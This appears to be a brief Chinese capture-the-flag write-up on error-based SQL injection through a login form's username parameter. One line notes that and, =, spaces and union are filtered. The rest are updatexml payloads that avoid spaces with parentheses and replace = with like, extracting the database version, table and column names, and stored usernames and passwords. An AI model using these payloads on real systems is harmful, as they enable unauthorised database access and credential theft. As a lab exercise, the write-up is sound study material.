过滤了and、=、空格、union等,使用updatexml报错注入
数据库版本:?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21
数据库名:?username=admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21
表名:?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=21
字段名:?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=21
字段值:?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))%23&password=21
只有一半,差后一半:?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=21
